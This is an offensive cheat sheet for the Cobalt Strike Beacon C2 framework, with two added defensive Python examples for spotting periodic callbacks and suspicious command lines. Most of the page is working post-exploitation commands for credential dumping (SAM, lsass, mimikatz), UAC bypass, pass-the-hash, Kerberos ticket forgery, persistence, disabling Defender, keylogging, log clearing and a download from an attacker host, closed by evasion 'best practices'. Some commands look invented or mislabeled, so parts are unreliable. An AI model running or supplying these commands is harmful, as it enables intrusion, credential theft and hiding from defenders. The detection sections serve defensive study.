Cobalt Strike Beacon
Cobalt Strike Beacon is the most widely used commercial C2 framework. It provides post-exploitation capabilities for Windows and Linux targets and supports multiple communication protocols.
Basic Beacon Commands
| Command | Description |
|---|---|
| sleep <seconds> | Set beacon callback delay (default 60s) |
| exit | Terminate the beacon session |
| jobs | List running background jobs |
| kill <pid> | Terminate process |
| ps | List processes |
| cd <path> | Change directory |
| pwd | Print working directory |
Process Management
# List all processes
beacon > ps
# Kill process
beacon > kill 1234
# Spawn process with output capture
beacon > run whoami
# Execute shellcode in process
beacon > inject 1234 x64 /tmp/shellcode.bin
# Create suspended process for injection
beacon > spawnas DOMAIN\user password cmd.exe
# Create process in alternate session
beacon > spawn x64 c:\windows\system32\rundll32.exe
Session/Listener Management
# View active beacons
beacon > sessions
# Connect to specific beacon
interact <beacon_id>
# Rename beacon
beacon > rename "Web Server"
# Sleep callback interval
beacon > sleep 60
beacon > sleep 0 # Interactive mode: beacon checks in continuously (very noisy)
# Note on beacon
beacon > note "Domain controller, critical system"
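The fixed callback interval set with sleep is also what a defender looks for. The following is an added detection example, not part of the original cheat sheet: it groups outbound connections per (source, destination) pair from constructed proxy log lines and flags pairs whose spacing is nearly constant.

```python
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: outbound HTTPS connections from one host, as an egress
# proxy might log them: "<utc time> <src> <dst:port>" (constructed, not real data).
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 203.0.113.10:443
2024-05-01T10:01:00 10.0.0.5 203.0.113.10:443
2024-05-01T10:02:00 10.0.0.5 203.0.113.10:443
2024-05-01T10:03:01 10.0.0.5 203.0.113.10:443
2024-05-01T10:04:00 10.0.0.5 203.0.113.10:443
2024-05-01T10:05:00 10.0.0.5 203.0.113.10:443
2024-05-01T10:00:13 10.0.0.5 198.51.100.7:443
2024-05-01T10:00:49 10.0.0.5 198.51.100.7:443
2024-05-01T10:03:20 10.0.0.5 198.51.100.7:443
"""

def parse(log):
    """Group connection timestamps by (src, dst) pair."""
    series = {}
    for line in log.splitlines():
        ts, src, dst = line.split()
        series.setdefault((src, dst), []).append(datetime.fromisoformat(ts))
    return series

def interval_stats(times, min_hits=5):
    """Mean gap between consecutive hits and its coefficient of variation,
    or None when there are too few hits to judge periodicity."""
    if len(times) < min_hits:
        return None
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    m = mean(gaps)
    return m, (pstdev(gaps) / m if m else 0.0)

def find_beacons(log, max_cv=0.1, min_hits=5):
    """Flag (src, dst) pairs whose callback spacing is nearly constant.
    Configured jitter widens the spread, so max_cv is the tuning knob."""
    hits = {}
    for key, times in parse(log).items():
        stats = interval_stats(times, min_hits)
        if stats and stats[1] <= max_cv:
            hits[key] = round(stats[0], 1)
    return hits

if __name__ == "__main__":
    for (src, dst), period in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: periodic callback every ~{period}s")
```

The second destination in the sample has too few hits to be judged, which is why min_hits exists: short-lived bursts should not trip a periodicity rule.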
File Operations
# Download file (staged)
beacon > download C:\Windows\System32\config\SAM /tmp/SAM
# Upload file
beacon > upload /tmp/payload.exe C:\Windows\Temp\update.exe
# List directory
beacon > ls C:\
beacon > ls -la C:\Users\Administrator\
# Create directory
beacon > mkdir C:\Temp\work
# Copy file
beacon > cp source.txt destination.txt
# Move/rename file
beacon > mv oldname.txt newname.txt
# Delete file
beacon > rm C:\Windows\Temp\payload.exe
Command Execution
# Execute shell command (PowerShell)
beacon > powershell Get-LocalUser
# Execute cmd.exe command
beacon > shell whoami /all
# Execute without capturing output
beacon > execute whoami
# Run executable with args
beacon > run C:\Windows\System32\whoami.exe
# Execute .NET assembly
beacon > execute-assembly /tmp/Seatbelt.exe -group=system
# Inline PowerShell execution
beacon > powerpick Get-AdComputer -Filter *
# Python execution
beacon > python import os; print(os.getcwd())
Windows Credential Dumping
# Local account enumeration via WMI
beacon > execute powershell.exe -NoP -C "Get-WmiObject -Class Win32_UserAccount"
# Registry dump (SAM/SYSTEM)
beacon > download C:\Windows\System32\config\SAM
beacon > download C:\Windows\System32\config\SYSTEM
# Process memory (lsass)
beacon > steal_token 672 # SYSTEM token
beacon > inject 672 x64 /tmp/meterpreter.bin
# Mimikatz (in-process)
beacon > mimikatz !privilege::debug !token::elevate !lsadump::sam
# Vault credential dumping
beacon > execute powershell.exe -NoP -C "Get-StoredCredential"
Privilege Escalation
# UAC bypass (various methods)
beacon > elevate uac-token-duplication
beacon > elevate uac-schtasks
beacon > elevate uac-eventvwr
# Direct privilege escalation exploits
beacon > exploit cve-2021-1732 # Windows Win32k Elevation
# Print spooler exploitation (PrintNightmare)
beacon > runasadmin powershell.exe -NoP -C "[...]PrintNightmare payload[...]"
# Token impersonation
beacon > steal_token 1234
beacon > impersonate DOMAIN\Administrator
beacon > rev2self # Revert to original token
Lateral Movement
# Pass-the-Hash (PTH)
beacon > pth DOMAIN\Administrator ntlmhash
# Kerberoast
beacon > kerberoast /format:hashcat /outfile:hashes.txt
# PsExec
beacon > psexec DOMAIN\Administrator hash \\target.example.com cmd.exe
# WMI lateral movement
beacon > wmi-execute \\target.example.com "whoami" Administrator hash
# Port forwarding
beacon > rportfwd 3389 192.168.1.100 3389 # Forward 3389 to target
# SOCKS proxy
beacon > socks 9050
# Use local proxy: proxychains <command>
Network Reconnaissance
# Network interfaces
beacon > ifconfig
# Routing table
beacon > route
# ARP table
beacon > arp
# Netstat
beacon > netstat
# DNS query
beacon > nslookup example.com
# Ping
beacon > ping 192.168.1.1
# Tracert
beacon > tracert example.com
Persistence Mechanisms
# Scheduled task
beacon > powershell.exe -NoP -C "Register-ScheduledTask -TaskName 'Update' -Trigger (New-ScheduledTaskTrigger -AtStartup) -Action (New-ScheduledTaskAction -Execute 'C:\Temp\beacon.exe')"
# Registry Run key
beacon > powershell.exe -NoP -C "Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Update' -Value 'C:\Temp\beacon.exe'"
# WMI event subscription
beacon > powershell.exe -NoP -C "[...]WMI event binding payload[...]"
# Shortcut hijacking
beacon > powershell.exe -NoP -C "[...]LNK file modification[...]"
# BITS job persistence
beacon > powershell.exe -NoP -C "Start-BitsTransfer -Source 'http://attacker.com/beacon.exe' -Destination 'C:\Temp\beacon.exe' -Suspended"
Defense Evasion
# Process injection
beacon > inject 1234 x64 /tmp/payload.bin
# Sleep obfuscation
beacon > sleep 3600 # Callback every hour
# Parent process spoofing
beacon > spawnto C:\Windows\System32\rundll32.exe
# API call obfuscation
beacon > powershell.exe -NoP -C "Set-Alias -Name GCI -Value Get-ChildItem"
# Disable Windows Defender
beacon > powershell.exe -NoP -C "Disable-WindowsDefenderAuditPolicy"
# AMSI bypass
beacon > powershell.exe -NoP -C "[System.Reflection.Assembly]::LoadWithPartialName('System.Core') | Out-Null..."
Data Exfiltration
# Screenshot
beacon > screenshot
# Keystroke logging
beacon > keylogger start
beacon > keylogger stop
beacon > keylogger dump
# Clipboard capture
beacon > clipboard_capture
# Web camera access
beacon > webcam_snap
# Browser data extraction
beacon > execute powershell.exe -NoP -C "[...]Chrome/Firefox credential stealer[...]"
# Slow exfil (stealth)
beacon > download C:\sensitive\file.docx /tmp/ # Default is ~512KB chunks
Kerberos Attacks
# Kerberoast
beacon > execute-assembly /tmp/Rubeus.exe kerberoast /format:hashcat
# AS-REP roasting
beacon > execute-assembly /tmp/Rubeus.exe asreproast /format:hashcat
# Golden ticket
beacon > execute-assembly /tmp/Rubeus.exe golden /user:Administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-xxx /ticket:base64_ticket
# Silver ticket
beacon > execute-assembly /tmp/Rubeus.exe silver /user:Administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-xxx /service:cifs/target.local
Reconnaissance
# System information
beacon > systeminfo
# Installed patches
beacon > execute powershell.exe -NoP -C "Get-Hotfix | Select HotFixID"
# User enumeration
beacon > net user
beacon > net group "Domain Admins" /domain
# Group membership
beacon > execute whoami /groups
# Domain enumeration (BloodHound)
beacon > execute-assembly /tmp/SharpHound.exe -c All
# Share enumeration
beacon > net view \\target.example.com
beacon > net view \\target.example.com\share1
Cleanup Operations
# Clear Event Log
beacon > shell wevtutil cl System
beacon > shell wevtutil cl Security
beacon > shell wevtutil cl Application
# Delete file
beacon > rm C:\Temp\beacon.exe
# Disable UAC for next session
beacon > powershell.exe -NoP -C "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"
# Kill beacon process
beacon > exit # Graceful exit
# Uninstall beacon completely
# (Requires removing all persistence mechanisms manually)
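A defender-side triage check for the command lines shown in the Persistence Mechanisms, Defense Evasion and Cleanup Operations sections above, as an added example that is not part of the original cheat sheet. The process-creation records are constructed, the rule names are my own, and the record format is an assumed simplification of Sysmon Event ID 1.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style), one per
# line as "<utc time>|<parent image>|<command line>". Not real telemetry.
SAMPLE_EVENTS = r"""
2024-05-01T10:12:03|C:\Windows\System32\cmd.exe|wevtutil cl Security
2024-05-01T10:12:07|C:\Windows\System32\rundll32.exe|powershell.exe -NoP -C "Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Update' -Value 'C:\Temp\beacon.exe'"
2024-05-01T10:12:09|C:\Windows\System32\rundll32.exe|powershell.exe -NoP -C "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"
2024-05-01T10:13:00|C:\Windows\explorer.exe|powershell.exe -File C:\Scripts\backup.ps1
""".strip()

# Rule names are my own; each regex targets one command line shown on this page.
RULES = [
    ("event_log_cleared", re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
    ("run_key_persistence", re.compile(r"CurrentVersion\\Run\b", re.I)),
    ("uac_disabled", re.compile(r"EnableLUA.*-Value\s+0\b", re.I)),
    ("powershell_noprofile", re.compile(r"powershell(\.exe)?\s.*-NoP(rofile)?\b", re.I)),
]

def classify(record):
    """Return (timestamp, [matched rule names]) for one record."""
    ts, parent, cmdline = record.split("|", 2)
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    # rundll32.exe is a common spawnto choice and an odd parent for PowerShell.
    if parent.lower().endswith("\\rundll32.exe") and "powershell" in cmdline.lower():
        hits.append("powershell_from_rundll32")
    return ts, hits

def triage(events):
    """Keep only records that matched at least one rule, in log order."""
    return [(ts, hits) for ts, hits in map(classify, events.splitlines()) if hits]

if __name__ == "__main__":
    for ts, hits in triage(SAMPLE_EVENTS):
        print(ts, ", ".join(hits))
```

The benign backup script in the last record matches nothing, which is the point of combining the parent-process check with command-line patterns rather than alerting on every PowerShell launch.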
Exit Operations
# Exit beacon (terminates the session)
beacon > exit
# Interactive shell exit
shell > exit
# Job termination (list jobs, then kill by id)
beacon > jobs
beacon > jobkill <job_id>
Best Practices
- Always use sleep intervals to avoid detection
- Implement proper OPSEC (rename beacons, rotate C2 infrastructure)
- Clean up logs after pivoting
- Use encrypted channels (HTTPS/mTLS)
- Verify target before executing irreversible operations
- Monitor for EDR/AV detection signals
- Rotate shellcode/payload signatures